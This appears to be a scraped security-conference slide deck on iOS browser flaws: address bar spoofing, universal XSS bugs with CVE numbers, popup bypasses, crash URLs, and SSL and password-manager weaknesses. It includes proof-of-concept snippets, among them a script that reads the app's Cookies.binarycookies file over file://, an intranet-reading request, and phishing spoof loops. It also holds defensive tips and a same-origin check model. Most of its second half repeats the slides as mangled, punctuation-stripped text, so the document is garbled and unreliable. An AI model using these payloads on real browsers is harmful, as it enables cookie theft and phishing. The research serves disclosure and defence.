XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing the same-origin policy. In UXSS the attacker exploits a vulnerability in the browser, not in the website (~ http://en.wikipedia.org/wiki/Cross-site_scripting). Famous after the PDF UXSS in 2007.

• CVE-2013-6893: UXSS in Mercury Browser for iOS
• CVE-2013-7197: UXSS in Yandex.Browser for iOS
• CVE-2012-2899: UXSS in Google Chrome for iOS
• …

CVE-2013-6893: UXSS in Mercury Browser
w = window.open('about:blank')
-> mbexec:$(WINDOW_ID)[ command: window.open, target: 1234, "url": "about:blank" ]
Math.random()
-> [webView loadRequest: … "about:blank" …]
-> cross-frame forgery
w.document.write('Hi')
-> mbexec:$(WINDOW_ID)[ "command": "window.document.write", target: 1234, "html": "Hi" ]
-> [webView stringByEvaluatingJavaScriptFromString: "document.write('Hi')"]
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any, at all.
w = window.open('https://accounts.google.com'); w.document.write('<script src=…></script>') … and it just works in accounts.google.com

CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() -> UXSS
Bug Bounty :-)

CVE-2012-2899: UXSS in Google Chrome
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of "no URL", right?
• [webView loadHTMLString:@"…" baseURL:nil]
• For baseURL = nil, UIWebView loads the applewebdata:// origin. Same as file:// - no same-origin policy, access to any web origin and to local files
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>')
• applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)

Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:[NSURL …@"about:blank"]]
• iOS 8: use WKWebView.UIDelegate webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
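The three UXSS cases above share one root cause: a bolted-on cross-tab bridge that either never checks origins (Mercury), checks them once at window.open() and not again at document.write() (Yandex.Browser), or loads the written markup into a privileged origin (Chrome, baseURL nil). As an added example that is not code from the deck or from any of those browsers, this is a model of such a bridge with the same-origin check run on every command against the target tab's current URL, and with the baseURL the native side should hand to loadHTMLString:baseURL: returned alongside the decision. Tab ids, URLs and command names are constructed for the example.

```javascript
// Origin in the scheme/host/port sense. The WHATWG URL parser folds default
// ports in, so "https://a.example:443/" and "https://a.example/" agree. Opaque
// origins (about:, data:, file:, applewebdata: and anything unparsable) are
// returned as null, so they never match a web origin and never match each other.
function originOf(url) {
  try {
    const origin = new URL(url).origin;
    return origin === 'null' ? null : origin;
  } catch (e) {
    return null;
  }
}

function sameOrigin(a, b) {
  const oa = originOf(a);
  return oa !== null && oa === originOf(b);
}

class TabRegistry {
  constructor() {
    this.tabs = new Map();   // tab id -> { url, inheritedOrigin, html }
    this.nextId = 1;
  }

  // Bridge command "window.open". A tab opened on about:blank inherits the
  // opener's origin, as browsers do, so "open blank, then write" still works.
  open(callerUrl, url) {
    const id = this.nextId++;
    const blank = url.toLowerCase().startsWith('about:blank');
    this.tabs.set(id, { url, inheritedOrigin: blank ? originOf(callerUrl) : null, html: null });
    return id;
  }

  // Any navigation of the child (including one the opener triggers right after
  // window.open) replaces its URL and ends the inherited about:blank origin.
  navigate(id, url) {
    const tab = this.tabs.get(id);
    if (!tab) return false;
    tab.url = url;
    tab.inheritedOrigin = null;
    return true;
  }

  // The origin the tab has *now*, not the one it had when it was opened.
  currentOrigin(id) {
    const tab = this.tabs.get(id);
    if (!tab) return null;
    return tab.inheritedOrigin !== null ? tab.inheritedOrigin : originOf(tab.url);
  }

  // Bridge command "window.document.write". Decided from the caller's origin and
  // the target's current origin on every call, never from a result cached at
  // open() time. On success the native side loads the markup with
  // loadHTMLString:baseURL: using the returned baseURL, never nil.
  write(callerUrl, id, html) {
    const tab = this.tabs.get(id);
    if (!tab) return { ok: false, reason: 'no such tab' };
    const caller = originOf(callerUrl);
    const target = this.currentOrigin(id);
    if (caller === null || target === null || caller !== target) {
      return { ok: false, reason: 'cross-origin document.write blocked' };
    }
    tab.html = html;
    return { ok: true, baseURL: tab.url };
  }
}
```

Opening about:blank from `https://app.example/page` and writing into it is allowed and yields `about:blank` as the baseURL (not nil); redirecting that child to another site and writing again is refused; a tab at `https://app.example:443/other` is same-origin with the opener while `http://app.example/`, a `file://` document and an `applewebdata://` caller are not.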
Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com"] -> nil
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com"), NULL) -> NULL
• Downloads opened directly from file://

Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')

Content-Type
• text/plain -> HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream -> HTML
• application/other, filename=*.html

JS without Same-Origin Policy
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') {
  path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
  path = path + '/Library/Cookies/Cookies.binarycookies';
  x = new XMLHttpRequest(); x.open('GET', path, false); x.send();
  alert(x.responseText);
}
</script>

<script>x = new XMLHttpRequest(); x.open('GET', 'https://your.intranet/', false); x.send(); alert(x.responseText)</script>

Challenge: hijack password autofill

Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header: HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false

Popups & URL handling

Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com"><iframe src="merc://example.com"> etc. bypass all popup blockers anyway…

URI schemes: Application (bolted-on), Native (WebKit), Bridge (internal), Registered (external)
• scheme://download/https://secure.tld/victim/data, scheme://download/http://attacker.tld/README.html
• scheme://add-filter?url=

CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a null pointer dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>

Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()

• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">

SSL & password managers

SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14% of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)

Password managers
• JavaScript with the privileges of the top frame -> passwords not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)

Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects, built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?

References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/

Questions?
lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
![Page 12: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/12.jpg)
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 13: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/13.jpg)
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
